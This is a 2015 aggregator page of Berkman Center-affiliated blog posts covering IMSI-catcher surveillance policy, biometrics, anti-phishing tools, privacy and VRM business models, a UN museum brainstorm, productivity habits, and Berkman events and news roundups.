Current Berkman People and Projects

Keep track of Berkman-related news and conversations by subscribing to this page using your RSS feed reader. This aggregation of blogs relating to the Berkman Center does not necessarily represent the views of the Berkman Center or Harvard University but is provided as a convenient starting point for those who wish to explore the people and projects in Berkman's orbit. As this is a global exercise, times are in UTC.

The list of blogs being aggregated here can be found at the bottom of this page.

May 02, 2015

Bruce Schneier
The Further Democratization of Stingray

Stingray is the code name for an IMSI-catcher, which is basically a fake cell phone tower sold by Harris Corporation to various law enforcement agencies. (It's actually just one of a series of devices with fish names -- Amberjack is another -- but it's the name used in the media.) What is basically does is trick nearby cell phones into connecting to it. Once that happens, the IMSI-catcher can collect identification and location information of the phones and, in some cases, eavesdrop on phone conversations, text messages, and web browsing.

The use of IMSI-catchers in the US used to be a massive police secret. The FBI is so scared of explaining this capability in public that the agency makes local police sign nondisclosure agreements before using the technique, and has instructed them to lie about their use of it in court. When it seemed possible that local police in Sarasota, Florida, might release documents about Stingray cell phone interception equipment to plaintiffs in civil rights litigation against them, federal marshals seized the documents. More recently, St. Louis police dropped a case rather than talk about the technology in court. And Baltimore police admitted using Stingray over 25,000 times.

The truth is that it's no longer a massive police secret. We now know a lot about IMSI-catchers. And the US government does not have a monopoly over the use of IMSI-catchers. I wrote in Data and Goliath:

There are dozens of these devices scattered around Washington, DC, and the rest of the country run by who-knows-what government or organization. Criminal uses are next.

From the Washington Post:

How rife? Turner and his colleagues assert that their specially outfitted smartphone, called the GSMK CryptoPhone, had detected signs of as many as 18 IMSI catchers in less than two days of driving through the region. A map of these locations, released Wednesday afternoon, looks like a primer on the geography of Washington power, with the surveillance devices reportedly near the White House, the Capitol, foreign embassies and the cluster of federal contractors near Dulles International Airport.

At the RSA Conference last week, Pwnie Express demonstrated their IMSI-catcher detector.

Building your own IMSI-catcher isn't hard or expensive. At Def Con in 2010, researcher Chris Paget demonstrated his homemade IMSI-catcher. The whole thing cost $1,500, which is cheap enough for both criminals and nosy hobbyists.

It's even cheaper and easier now. Anyone with a HackRF software-defined radio card can turn their laptop into an amateur IMSI-catcher. And this is why companies are building detectors into their security monitoring equipment.

Two points here. The first is that the FBI should stop treating Stingray like it's a big secret, so we can start talking about policy.

The second is that we should stop pretending that this capability is exclusive to law enforcement, and recognize that we're all at risk because of it. If we continue to allow our cellular networks to be vulnerable to IMSI-catchers, then we are all vulnerable to any foreign government, criminal, hacker, or hobbyist that builds one. If we instead engineer our cellular networks to be secure against this sort of attack, then we are safe against all those attackers.


We have one infrastructure. We can't choose a world where the US gets to spy and the Chinese don't. We get to choose a world where everyone can spy, or a world where no one can spy. We can be secure from everyone, or vulnerable to anyone.

Like QUANTUM, we have the choice of building our cellular infrastructure for security or for surveillance. Let's choose security.

EDITED TO ADD (5/2): Here's an IMSI catcher for sale on At this point, every dictator in the world is using this technology against its own citizens. They're used extensively in China to send SMS spam without paying the telcos any fees. On a Food Network show called Mystery Diners -- episode 108, "Cabin Fever" -- someone used an IMSI catcher to intercept a phone call between two restaurant employees.

The new model of the IMSI catcher from Harris Corporation is called Hailstorm. It has the ability to remotely inject malware into cell phones. Other Harris IMSI-catcher codenames are Kingfish, Gossamer, Triggerfish, Amberjack and Harpoon. The competitor is DRT, made by the Boeing subsidiary Digital Receiver Technology, Inc.

EDITED TO ADD (5/2): Here's an IMSI catcher called Piranha, sold by the Israeli company Rayzone Corp. It claims to work on GSM 2G, 3G, and 4G networks (plus CDMA, of course). The basic Stingray only works on GSM 2G networks, and intercepts phones on the more modern networks by forcing them to downgrade to the 2G protocols. We believe that the more moderm ISMI catchers also work against 3G and 4G networks.

by Bruce Schneier at May 02, 2015 04:22 PM

May 01, 2015

Bruce Schneier
Ears as a Biometric

It's an obvious biometric for cell phones:

Bodyprint recognizes users by their ears with 99.8% precision with a false rejection rate of only 1 out of 13.

Grip, too.

News story.

EDITED TO ADD: I blogged this in 2011.

by Bruce Schneier at May 01, 2015 07:41 PM

Protecting Against Google Phishing in Chrome

Google has a new Chrome extension called "Password Alert":

To help keep your account safe, today we're launching Password Alert, a free, open-source Chrome extension that protects your Google and Google Apps for Work Accounts. Once you've installed it, Password Alert will show you a warning if you type your Google password into a site that isn't a Google sign-in page. This protects you from phishing attacks and also encourages you to use different passwords for different sites, a security best practice.

Here's how it works for consumer accounts. Once you've installed and initialized Password Alert, Chrome will remember a "scrambled" version of your Google Account password. It only remembers this information for security purposes and doesn't share it with anyone. If you type your password into a site that isn't a Google sign-in page, Password Alert will show you a notice like the one below. This alert will tell you that you're at risk of being phished so you can update your password and protect yourself.

It's a clever idea. Of course it's not perfect, and doesn't completely solve the problem. But it's an easy security improvement, and one that should be generalized to non-Google sites. (Although it's not uncommon for the security of many passwords to be tied to the security of the e-mail account.) It reminds me somewhat of cert pinning; in both cases, the browser uses independent information to verify what the network is telling it.

Slashdot thread.

EDITED TO ADD: It's not even a day old, and there's an attack.

by Bruce Schneier at May 01, 2015 02:52 AM

April 30, 2015

Bruce Schneier
Measuring the Expertise of Burglars

New research paper: "New methods for examining expertise in burglars in natural and simulated environments: preliminary findings":

Expertise literature in mainstream cognitive psychology is rarely applied to criminal behaviour. Yet, if closely scrutinised, examples of the characteristics of expertise can be identified in many studies examining the cognitive processes of offenders, especially regarding residential burglary. We evaluated two new methodologies that might improve our understanding of cognitive processing in offenders through empirically observing offending behaviour and decision-making in a free-responding environment. We tested hypotheses regarding expertise in burglars in a small, exploratory study observing the behaviour of 'expert' offenders (ex-burglars) and novices (students) in a real and in a simulated environment. Both samples undertook a mock burglary in a real house and in a simulated house on a computer. Both environments elicited notably different behaviours between the experts and the novices with experts demonstrating superior skill. This was seen in: more time spent in high value areas; fewer and more valuable items stolen; and more systematic routes taken around the environments. The findings are encouraging and provide support for the development of these observational methods to examine offender cognitive processing and behaviour.

The lead researcher calls this "dysfunctional expertise," but I disagree. It's expertise.

Claire Nee, a researcher at the University of Portsmouth in the U.K., has been studying burglary and other crime for over 20 years. Nee says that the low clearance rate means that burglars often remain active, and some will even gain expertise in the crime. As with any job, practice results in skills. "By interviewing burglars over a number of years we've discovered that their thought processes become like experts in any field, that is they learn to automatically pick up cues in the environment that signify a successful burglary without even being aware of it. We call it 'dysfunctional expertise,'" explains Nee.

See also this paper.

by Bruce Schneier at April 30, 2015 07:22 PM

David Weinberger
A UN museum?

I got to spend yesterday with an awesome group of about twenty people at the United Nations, brainstorming what a UN museum might look like. This was under the auspices of the UN Live project which (I believe) last week was endorsed by UN Secretary General Ban Ki-moon.

Some of the people at the meeting
Some of us

Although it was a free-ranging discussion from many points of view, there seemed to be general implicit agreement about a few points. (What the UN Live group does with this discussion is up to them, of course.)

Security Council
Where we did not meet

First, there was no apparent interest in constructing a museum that takes telling the UN’s story as its focus. Rather, the discussion was entirely about ways in which the values of the UN could be furthered by enabling people to connect with one another around the world.

Second, No one even considered the possibility that it might be only a physical museum. Physical elements were part of many of the ideas, but primarily to enable online services.

Here are some of the ideas that I particularly liked, starting (how rude!) with mine.

I stole it directly from a Knight Foundation proposal by my friend Nate Hill at Chattanooga Public Library. He proposed setting up 4K displays in a few libraries that have gigabit connections, to enable local residents to interact with one another. At the meeting yesterday I suggested (crediting Nate, but probably too fast for anyone to hear me, so I’m clear, right?) that the Museum be distributed via “magic mirrors” – Net-connected video monitors – that connect citizens globally. These would go into libraries and other safe spaces where there can be facilitators. (We’re all local people, so we need help talking globally.) Where possible, there might be two screens so that people can see themselves and the group they’re talking with. (For some reason, I like the idea of the monitors being circular. More like portals.)

These magic mirrors would be a platform for activities to be invented. For example:

  • Kids could play together. Virtual Jenga? Keep a virtual ball afloat? (Assume Kinect-like sensors.) Collaborative virtual jigsaw puzzle of a photo of one of their home towns? Or maybe each group is working collaboratively on one puzzle, but each team’s pieces are part of the image of the other’s team’s home. A simple mirror imitation game where each kid mimics the other’s movements? It’s a platform, so it’d be open to far better ideas than these.

  • Kids could create together. Collaborative drawing? Collaborative crazy machines a la Rube Goldberg?

  • Real-time, video AMAs: “We’re Iranian parents. AUA [ask us anything] at 10am EDT.”

  • Listings for other activities, including those proposed below.

Someone suggested that the UN create pop-up museums by bringing in a shipping container stocked with media tools. (Technically, a plop-down museum, it seems to me.) The local community would be invited to tell its story, perhaps in 100 images (borrowing the British Museum’s “A History of the World in 100 Objects”), or perhaps by providing a StoryCorps-style recording booth. Or send the kids out with video cameras. (There might have to be someone who could help with the media.) The community would be able to tell its story to the world. The world could react and interact. (These containers could contain magic mirrors.)

Another idea: Facilitate local people coming together virtually to share solutions to common problems, building on the multiple and admirable efforts to do this already.

Another idea: One group pointed out that museums typically face backwards in time. So suppose the UN museum instead constructed itself in real time as significant events occurred. E.g., as an earthquake disaster unrolls, the UN Museum would track it live, presenting its consequences intimately to the world, recording it for posterity, and facilitating relief efforts.

There was general agreement, I believe, that all of the UN Museum’s content should be openly available through APIs.

There were many, many more ideas, many of which I find exciting. I don’t know if any of the ideas discussed are going to make it past the cool-way-to-spend-an-afternoon phase, but I am thrilled by the general prospect of a UN Museum that takes as its mission not just the curation of artifacts that tell a story but advancing the UN’s mission by connecting people globally around common concerns, shared interests, and a desire to help and delight one another.

Now go ahead and be cynical and snarky.

The post A UN museum? appeared first on Joho the Blog.

by davidw at April 30, 2015 07:13 PM

The Birth of Rice-A-Roni and the Power of Podcasts

This week, as people observe the 100th anniversary of the Armenian Genocide, the Fugitive Waves podcast published a story about Rice-A-Roni. The genocide and the ubiquitous rice mix are linked in an unexpected way: A young couple rent a room from an old Armenian woman. The older woman, Pailadzou Captanian, teaches her young, pregnant tenant how to cook, and shares her personal stories of the Armenian tragedy – stories that she published in a book decades earlier. From these kitchen sessions comes a delicious pilaf that eventually becomes Rice-A-Roni.

Read more and view photos.

Nikki Silva of The Kitchen Sisters, which produces Fugitive Waves, shared some thoughts about the piece:

“The Birth of Rice-A-Roni” was originally a shorter piece for NPR’s Morning Edition. It absolutely killed us that we couldn’t include more than a quick mention of Mrs. Captanian and her rare eyewitness account. I’ve been sitting here listening back to the tapes and crying – because of the stories, but also because it’s taken us so long to get them out there. So, finally, we’re able to include extended interviews with the librarian in Germany who translated the book, and with Mrs. Captanian’s grandson, and can begin to piece together the story of this woman’s experiences and accomplishments.

Hooray for podcasts!

Hooray, indeed. Listen to the episode, and subscribe to Fugitive Waves. Listen to all the Radiotopia shows at

The post The Birth of Rice-A-Roni and the Power of Podcasts appeared first on PRX.

by Rekha at April 30, 2015 02:54 PM

Joseph Reagle
The Conversation Newbie

On the recommendation of my colleague Matt Nisbet, I submitted a piece related to Reading the Comments to The Conversation, an online publisher aiming for the sweet spot of "academic rigor, journalist flair." The result is the short essay "The Social Graph Won't Save Us from What's Wrong with Online Reviews."

As someone who typically chafes at most publishing processes (submitting Word documents via crappy Web forms), I found this to be delightful! The process is very web friendly: I got to write in markdown (how I write everything) and links are welcome, as are images. The results are available under the Creative Commons Attribution/No derivatives license and they encourage syndication. My editor (Maggie Villiger) was helpful and responsive.

I highly recommend it, and I share these lessons I learned as a newbie:

  • I recommend you have a markdown editor you are comfortable with. The online editor is okay, but switching between the source and preview tabs is a little awkward.
  • They seem to prefer inline to reference links; I find that makes the prose busy for editing purposes, but it's easy enough to convert between the two with pandoc.
  • Have some creative commons images in mind for the piece; I make much use of Wikimedia Commons and flickr.
  • Authors have final control over publishing, it won't post until you press "Approve" upon request by your editor. That said, it was a little confusing in that I approved working versions that I wanted to save (and get feedback on) but not really approve for publishing.

by Joseph Reagle at April 30, 2015 04:00 AM

April 29, 2015

Of vaults and honey pots

Personal Blackbox ( is a new #VRM company — or so I gather, based on what they say they offer to users: “CONTROL YOUR DATA & UNLOCK ITS VALUE.”

So you’ll find them listed now on our developers list.

Here is the rest of the text on their index page:


PBB is a technology platform that gives you control of the data you produce every day.

PBB lets you gain insights into your own behaviors, and make money when you choose to give companies access to your data. The result? A new and meaningful relationship between you and your brands.

At PBB, we believe people have a right to own their data and unlock its benefits without loss of privacy, control and value. That’s why we created the Personal Data Independence Trust. Take a look and learn more about how you can own your data and its benefits.

In the meantime we are hard at work to provide you a service and a company that will make a difference. Join us to participate and we will keep you posted when we are ready to launch.

That graphic, and what seems to be said between the lines, tells me Personal Blackbox’s customers are marketers, not users.  And, as we so often hear, “If the service is free, you’re the product being sold.”

But, between the last paragraph and this one, I ran into Patrick Deegan, the Chief Technology Officer of Personal Blackbox, at the PDNYC meetup. When I asked him if the company’s customers are marketers, he said no — and that PBB (as it’s known) is doing something much different that’s not fully explained by the graphic and text above, and is tied with the Personal Data Independence Trust, about which not much is said at the link to it. So I’ll withhold any more judgement about it until I know more, and instead pivot to the subject of VRM business models, which that graphic brings up for me.

I see two broad ones, which I’ll call vault and honey pot.

The vault model gives the individual full control over their personal data and what’s done with it, which could be anything, for any purpose. That data primarily has use value rather than sale value.

The honey pot model also gives the individual control over their personal data, but mostly toward providing a way to derive sale value for that data (or something similar, such as bargains and offers from marketers).

The context for the vault model is the individual’s whole life, and selective sharing of data with others.

The context for the honey pot model is the marketplace for qualified leads.

The honey pot model goes after low-hanging fruit. It’s also where all the money is, at least for now. The path to market success is a lot faster in the short run if you find new ways to help sellers sell.  $zillions are being spent on that, all the time. (Just look at the advertising coming along with that last link, to a search).

The vault model goes after the whole world of individuals. Being customers, or consumers, is just one of the many roles we play in that world. Who we are and what we do — embodied in our data — is infinitely larger that what’s valuable to marketers. But there’s not much money in that yet.

I also think the heart of VRM is in the vault model. But we have a big tent here, and many paths to explore. (And many metaphors to mix.)

by Doc Searls at April 29, 2015 03:40 PM

Nick Grossman
Anti-workflow: to-dos

A while back, I wrote about Anti-Workflow Apps — apps that solve problems for you without forcing you to adopt a workflow that you may never fully be able to adopt.  Workflow apps (CRMs, to-do lists, project management tools) are super hard to drive adoption towards, as everyone works differently and really resists this kind of change.  (of course, it’s possible when the reward is super good — e.g., slack and git/github — bit those times are rare and more often than that an attempted re-workflow goes splat)

So I’ve been on the lookout for Anti-Workflow tools.  Solutions that solve a problem that you think requires a new workflow, but may actually be more effectively solved another, more clever way Today I want to talk about to-dos, because I seem to have found my own personal anti-workflow solution.

I’ve always struggled with to-dos — I’ve used every to-do management tool on earth, and have never been able to adopt a workable, effective system.  I’ve tried everything from complicated tracking systems like OmniFocus to simple to-do lists of every possible flavor.  Nothing has stuck.  For years and years, I kept trying, trying and trying again.

In the end, I just gave up and said, fuck it, I’m not using a to-do list anymore. Not going to even try.

What happened was that I ended up keeping track of my priorities in a totally different way — a way that was actually more in tune with my existing workflows.  One part of the solution was pretty obvious, and one was surprising.

On the obvious side: the calendar.  For things that I absolutely must do, and that require dedicated time, I just use my calendar.  I’m in my calendar all day long, so it’s the perfect place to block out time for important things.  So now I set calendar entries for myself, to make sure I set aside time for things that need focus.

The calendar is good for things I know I need to do, and that I know are important.  What it’s not good for is capturing notes, ideas, and small to dos, which often just need to be captured in the moment and prioritized & dealt with (or not) later.  This is the use case that has always drawn me back to to-do apps, to no avail.

In particular, the really bad thing about a to-do list for this use case is that all it does is make you feel guilty.  Items get added to the list, and whether you really need to do them or not, you feel drawn to.  And then when it doesn’t happen the to-do list just becomes a giant pile of guilt that you do your best to ignore (that’s what happens to me at least).

That brings us to the less obvious solution.  What I’ve found is that a great way to handle both the capture / prioritization issue and the guilt issue is to use a Sparkfile.  Long time readers will know that this blog is named after my favorite idea from Steven Johnson’s Where Good Ideas Come From: the “slow hunch” approach to developing ideas.  Another idea from that book — unearthed by studying epic thinkers of the past like Darwin and DaVinci — is the Sparkfile: a long, running list of thoughts & ideas.  Fragments that pile on one another over time. One way to cultivate the slow hunch is not only to keep a sparkfile (in addition to other kinds of journals), but to constantly pour back through it re-reading and reconsidering your previous thoughts, ideas and observations.

Turns out that this is also a pretty good way to filter inbound ideas of things to do.  Just add them to the spark file, continually review the list, and occasionally do things (immediately or via calendar), and then add new stuff to the top as you think of more things.  No pressure — and absolutely no expectation — to do everything on the list or turn it into a perfect set of priorities.  Just let the mind run, capturing as you go.

For me, this idea ties back into anti-workflow because I’ve been keeping a personal blog/journal for about 7 years now.  Which was in many ways a sparkfile, though it started out slightly more long form (starting with a private wordpress blog).  The big revolution happened last fall, when I switched over to using Diaro.  Diaro is a personal journal tool, with both a desktop web client as well as a mobile app.  The mobile app is the key, as it makes it possible to really quickly jot down a thought — as quickly as you’d do on a to-do app, or email, or notepad.

So in the end, the solution to my to-do workflow was not to add a new to-do workflow.  Rather, it was to extend the workflows I already had going, calendars and the sparkfile.  Boy it feels good.

by Nick Grossman at April 29, 2015 02:26 PM

Toward VRooMy privacy policies

Canofworms1In The nightmare of easy and simple, T.Rob unpacks the can of worms that is:

  1. one company’s privacy policy,
  2. provided by another company’s automatic privacy policy generating system, which is
  3. hosted at that other company, and binds you to their privacy policy, which binds you to
  4. three other companies’ privacy policies, none of which assure you of any privacy, really. Then,
  5. the last of these is Google’s, which “is basically summed up as ‘we own your ass'” — and worse.

The company was GeniCan — a “smart garbage can” in the midst of being crowdfunded. GeniCan, like so many other connected devices, lives in the Internet of Things, or IoT. After exploring some of the many ways that IoT is already FUBAR in the privacy realm, T.Rob offers some constructive help:

The VRM Version
There is a possible version of this device that I’d actually use.  It would be the one with the VRM-ypersonal cloud architecture.  How does that work?  Same architecture I described in San Francisco:

  • The device emits signed data over pub/sub so that secondary and tertiary recipients of data can trust it.

  • By default, the device talks to the vendor’s service so users don’t need any other service or device to make it work.

  • The device can be configured to talk to a service of the user’s choosing instead of, or in addition to that of the manufacturer.

  • The device API is open.

Since privacy policy writing for IoT is pretty much a wide-open greenfield, that provides a helpful starting point. It will be good to see who picks up on it, and how.

by Doc Searls at April 29, 2015 02:08 PM

Bruce Schneier
Remote Proctoring and Surveillance

Interesting article. There are a lot of surveillance and privacy issues at play here.

by Bruce Schneier at April 29, 2015 11:12 AM

April 28, 2015

Dan Gillmor - Mediactive
Some other media I create…

A few weeks ago I asked my Digital Media Literacy students to write a blog post about the media they create on a routine basis — email, social media, blogs, phone photos, etc. I wrote a post of my own as an example.

What I didn’t mention in my instructions was another kind of media we create: data that we don’t realize we’re creating, and which we largely don’t control. Here’s an attempt to quantify at least some of that.

When we take a photo with a typical mobile phone camera app, a lot more data get created than just the JPEG file that contains the picture itself. The phone, depending on the hardware and settings, stores some or all of the following: the location where the picture was taken; the time and date it was taken; what compass direction the camera was pointing; whether the phone was moving; and more.

clock permissions Mobile apps in general frequently generate and save — often on remote computers — all kinds of things including location. They copy our contacts’ information. They look at our calendars. They check our phone numbers, the calls we’ve made, duration of the calls, etc.

I consider this kind of collection to be just short of spyware territory. The clock app in my phone has absolutely no legitimate reason to know my phone number and calls, yet it demands that permission. I block that kind of stuff–something I can do because I run an operating system called Cyanogenmod, which has fairly granular permission settings, unlike most mobile operating systems.

I create “cookies” on my computers (laptop, phone, etc.) when I visit other people’s sites and services. Cookies are used for many purposes, including identifying me for return visits, but also to create ways to track what I do.

Using the Web in general is an exercise in being spied on — it’s the fundamental business model for all of the “free” services such as Facebook and Google, as well as countless others. My visits to other people’s sites enables them to create all kinds of usage data on their own servers, not just on my computers.

I can’t prevent the spying entirely, and don’t want to when I’m getting something of high enough value in return. But I use a number of tools to keep the spying to a minimum. They include the permission settings in my mobile phone, and browser plugins that block (at least some of) the tracking. Students in my digital media literacy course are reading about ways to deter the invasion, and I hope they’ll take advantage of them.

People generally are becoming more aware of what we might call unintended data/media creation. That’s a good thing, and perhaps it’ll lead to broader countermeasures.



by Dan Gillmor at April 28, 2015 10:08 PM

Bruce Schneier
Shaking Someone Down for His Password

A drug dealer claims that the police leaned him over an 18th floor balcony and threatened to kill him if he didn't give up his password. One of the policemen involved corroborates this story.

This is what's known as "rubber-hose cryptanalysis," well-described in this xkcd cartoon.

by Bruce Schneier at April 28, 2015 05:50 PM

Berkman Center front page
Intellectual Privacy


with author Neil Richards


Come see @neilmrichards explain how privacy and free expression are essential to each other as he talks about his new book Intellectual Privacy.

Parent Event

Berkman Luncheon Series

Event Date

Apr 28 2015 12:00pm to Apr 28 2015 12:00pm
Thumbnail Image: 

Tuesday, April 28, 2015 at 12:00 pm

Why is it bad when the government or companies monitor our reading or web-surfing? We have intuitions that this kind of surveillance is bad, but have failed to explain why digital monitoring in an age of terror and innovation is really a problem. In Intellectual Privacy, Neil Richards offers a new way of thinking about monitoring of our thinking, reading, and communications, one that ensures that our ideas and values keep pace with our technologies.

Although we often think of privacy and free speech as being in conflict, Richards shows how privacy and free speech are often essential to each other. He explains the importance of 'intellectual privacy,' protection from surveillance or interference when we are engaged in the processes of generating ideas - thinking, reading, and speaking with confidantes before our ideas are ready for public consumption. In our digital age, in which we increasingly communicate, read, and think with the help of technologies that track us, increased protection for intellectual privacy has become an imperative.

A timely and provocative book on a subject that affects us all, Intellectual Privacy will radically reshape the debate about privacy and free speech in our digital age.

About Neil

Neil Richards is an internationally-recognized expert in privacy law, information law, and freedom of expression. He is a professor of law at Washington University School of Law, an affiliate scholar with the Stanford Center for Internet and Society, a member of the Advisory Board of the Future of Privacy Forum, and a consultant and expert in privacy cases. He graduated in 1997 with degrees in law and history from the University of Virginia, and served as a law clerk to Chief Justice William H. Rehnquist.

Professor Richards is the author of Intellectual Privacy (Oxford Press 2015). His many writings on privacy and civil liberties have appeared in many academic journals including the Harvard Law Review, the Columbia Law Review, the Virginia Law Review, and the California Law Review. He has written for a more general audience in Time, Slate, Wired,, Forbes, the Boston Review, and the Chronicle of Higher Education.

Professor Richards regularly speaks about privacy, technology, and civil liberties throughout the United States and Europe, and also appears frequently in the media. At Washington University, he teaches courses on privacy, free speech, and constitutional law, and is a past winner of the Washington University School of Law's Professor of the Year award. He was born in England, educated in the United States, and lives with his family in St. Louis. He is an avid cyclist and a lifelong supporter of Liverpool Football Club.

Twitter:  @neilmrichards



by candersen at April 28, 2015 01:09 PM

Bruce Schneier
Nice Essay on Security Snake Oil

This is good:

Just as "data" is being sold as "intelligence", a lot of security technologies are being sold as "security solutions" rather than what they for the most part are, namely very narrow focused appliances that as a best case can be part of your broader security effort.

Too many of these appliances do unfortunately not easily integrate with other appliances or with the rest of your security portfolio, or with your policies and procedures. Instead, they are created to work and be operated as completely stand-alone devices. This really is not what we need. To quote Alex Stamos, we need platforms. Reusable platforms that easily integrate with whatever else we decide to put into our security effort.

Slashdot thread.

by Bruce Schneier at April 28, 2015 11:21 AM

Center for Research on Computation and Society (Harvard SEAS)
Babis Tsourakakis' tutorial proposal accepted to KDD 2015
April 27, 2015

Babis Tsourakakis' tutorial proposal has been accepted to ACM SIGKDD Conference on Knowledge Discovery and Data Mining. KDD 2015 is a premier conference that brings together researchers and practitioners from data mining, knowledge discovery, data analytics, and big data. KDD 2015 will be the first Australian edition of KDD, and is its second time in the Asia Pacific region.

by kmavon at April 28, 2015 01:39 AM

April 27, 2015

Jeffrey Young
Wearable Teaching? College to Experiment With Apple Watch as Learning Tool

This post first appeared at

Even before the Apple Watch was released, professors and pundits began speculating on whether it and other wearable devices might play a role in college classrooms. On Monday researchers at Pennsylvania State University’s main campus announced that they would be among the first to test the device’s usefulness in the classroom.

The experiment will begin this summer, with eight Apple Watches the university purchased for the project. Penn State plans to expand the research to more students in the fall. We caught up with Kyle Bowen, director of education-technology services at Penn State, to hear more about the project, and his thoughts on the possible role of wearables in teaching and learning. Following is an edited version of the conversation.

Q. I understand a professor there will be experimenting with Apple Watch to measure student learning this fall. Can you briefly describe that project?

A. What we’re looking at in this particular research is how can we use wearable technologies like the Apple Watch to help students think about and reflect about how they learn. We know what the hallmarks are of engaged students: There are years of research that help us understand what an engaged student is and what they look like. But one of the challenges you have is how do you capture those types of activities in a Fitbit-like way — something that is very simple and easy to interact with, to think about reflectively how it is that you’re learning. We’re looking at the Apple Watch as a reflective tool to capture how the students are reacting with their classmates, how they’ve been interactive with their material, how they’re learning and using that to self-inform the student in a number of different ways.

Q. Can you paint a picture of what that will look like for one of the students in this experiment?

A. How it works is, the student will wear the watch and on kind of a random interval the student will get sampled from a series of questions, and will receive a question like, “Have you studied with a classmate recently?” Or, “How much have you spent studying recently?” Or, “Have you applied something recently from another course to your current class?” So that will be the first step … capturing that piece of information. And we’d have a series of questions like that throughout the day, and when the student would get that question, they could kind of respond to it, or dismiss it and answer it another time. Additionally, the student could … provide a voice feedback, so they could talk to us into the watch about how they’ve been studying. And we can convert that and actually do some textual analysis after the fact.

Q. Why not just use a smartphone? What additional benefit do you get out of the watch?

A. The way I like to explain it is, the watch can exist with the student at the moment of learning, but do it in a way that it’s not between them and whatever’s being taught. So it sits on their wrist and it’s with you, but it’s not in your hand. It’s not something you necessarily have to think about and pull out of your pocket and do. That’s the idea … that it becomes virtually transparent as part of that process. So the question is, Would you receive more interaction as a result of that on a regular basis, and does that lead to better reflection on how you’ve been learning?

Q. In the past Apple has encouraged pilot projects in education for their new devices. Is Apple supporting this project in any way?

A. We’ve been discussing this off and on with Apple. We’ve had some of our developers out to a developers’ event centered on the watch earlier this week. And that’s sort of the level of engagement at this point.

Q. People often seem interested in how new Apple products might be used in the classroom. It happened with iPads and iPhones before that. What is your prediction. Do you see Apple Watches as becoming a classroom device in some way?

A. In the classroom the early opportunity is going to be as a teaching device. It provides a lot of the same types of functionality that we saw with smartphones and tablets. However, the advantage now is that for the faculty member they can truly be hands-free. So they can do things like control their presentation, but they no longer have to stand at a lectern to do it or even have a clicker anymore [to advance the slides]. They could just use the watch to interact with their presentation material. A lot of these small little apps that we’ve seen to, say, identify a random student — these types of small tools to automate the classroom experience can be put onto a watch, and no longer do I have to think about having to stand at the lectern because I want to use my hands or carry around a tablet. Now I just have a device on my wrist, and I can interact with it.

Q. When the Apple Watch was first announced, a professor put out a parody of how this kind of wearable could be overkill in the academic context, including noting that one feature could be to send an electric shock to the user’s wrist if an academic paper gets rejected to remind you to work harder next time. What do you say to professors who feel that this is too much bells and whistles for the classroom?

A. It very well may be. It’s just like everything else. It’s the point at which it becomes useful. Wearables like the Apple Watch have yet to find their killer app, the thing that everybody can all get excited about to say, This is why you would have it as part of the learning experience. So this is to understand it. We can begin to see what the opportunities are.

Q. What about access? To use the Apple Watch requires owning an iPhone and this expensive new device. Could this further a divide between tech haves and have-nots in higher education?

A. It’s certainly something to keep in mind, so that’s why we should keep in mind what are the value points? That’s why we’re starting this exploration at a small level, and comparing this with other devices that are more common. To find out: These are the kinds of advantages that make it more worthwhile or less worthwhile. To enter in with a large amount of skepticism but thinking, What are the opportunities?

Q. So are you wearing an Apple Watch now?

A. Yeah. I did not call you on it, though. I just got it this morning, and I’ve just been playing around with it. It’s really neat. If you’ve ever watched Knight Rider as a kid, I can’t help but feel like that. You can text through it; you can call through it, which was kind of unexpected. The way they engineered the interaction on the device is really elegant. It’s surprisingly easy to interact with. For first-generation technology I’m impressed by it. But it doesn’t have its killer app yet.

by jryoung at April 27, 2015 08:40 PM

Berkman Center front page
Berkman Buzz: April 27, 2015


Wikipedia's success, Ethiopia's crackdown, algorithm questions, the busy Cyberlaw Clinic, and more... in this week's Buzz.

Thumbnail Image: 

The Berkman Buzz is a weekly collection of work, conversations, and news from around the Berkman community.


Jonathan Zittrain explores the success of Wikipedia


Harvard University's Jonathan Zittrain explores the amazing success of Wikipedia, a concept that "works really well in practice, just not in theory." Not only is it a remarkable and unique model of a self-regulating entity, its governors and stakeholders are both members of the public at large. Zittrain examines whether Wikipedia is something that can be sustained long term, whether it will need to adapt or grow in the future, and whether such adaptations and growth could potentially scuttle the entire operation. Finally, Zittrain offers up a suggestion for how to apply Wikipedia in an academic setting: Why not turn Wikipedia articles into long-term research projects?


From the intro to his Big Think video, "Why Wikipedia Works Really Well in Practice, Just Not in Theory, with Jonathan Zittrain"
About Jonathan | @zittrain

Cyberlaw Clinic files amicus briefs on free speech and location privacy

Quotation mark

On Tuesday, the Cyberlaw Clinic filed an amicus brief in the Supreme Judicial Court of Massachusetts on behalf of the New England First Amendment Coalition, Boston Globe Media Partners, LLC (owners of the Boston Globe), Hearst Television, Inc. (owners of WCVB-TV Channel 5 in Boston), the Massachusetts Newspaper Publishers Association, the New England Newspaper and Press Association, Inc., and the New England Society of Newspaper Editors in Commonwealth v. Lucas, SJC-11830. The case was brought under the Massachusetts false campaign speech law, M.G.L. ch. 56 § 42 ("Section 42"). The defendant in the case, a treasurer with a political action committee that sent a mailer in the 2014 state election, challenged the constitutionality of the statute under the First Amendment and Article 16 of the Massachusetts Declaration of Rights.

Quotation mark

The Cyberlaw Clinic filed an amicus brief this week in the Supreme Judicial Court of Massachusetts on behalf of the American Civil Liberties Union of Massachusetts (ACLUM) and the Electronic Frontier Foundation (EFF) in Commonwealth v. Estabrook, SJC-11833. The case concerns location privacy and cell phone technology - specifically, whether law enforcement can gather a large amount of cell phone location information if it only plans to use a small fraction of that information in a prosecution.


From the blog posts, "Clinic Files Amicus Brief on Free Speech Issue in Massachusetts" and "Clinic Files Amicus Brief in Mass SJC on Location Privacy"
About the Cyberlaw Clinic | @cyberlawclinic

Zeynep Tufekci speaks about the challenges of online social change


These days, all it takes to start a protest is a cell phone, says professor Zeynep Tufekci. But does the ease of social media impede social movements from making big gains?

"Today's protests have become a bit like climbing Mt. Everest with the help of 60 Sherpas, and the Internet is our Sherpa." - Zeynep Tufekci


From her TED talk featured on NPR's TED Radio Hour, "Online social change: easy to win, hard to organize"
About Zeynep | @zeynep

Ellery Roberts Biddle considers Ethopia's crackdown on journalists and dissent


Ethiopia currently ranks fourth on a list of the world's most censored countries, according to a Committee to Protect Journalists report released this week.

In the run-up to elections in May, the report found that the government had filed lawsuits accusing six publications of "encouraging terrorism," forcing 16 journalists to flee into exile, while the sole internet provider, Ethio Telecom, stand accused of routinely suspending critical news websites.


From her article in the Guardian, "One year on, jailed Ethiopian bloggers are still awaiting trial"
About Ellery | @ellerybiddle

New Harvard Law case study examines societal questions raised by algorithms


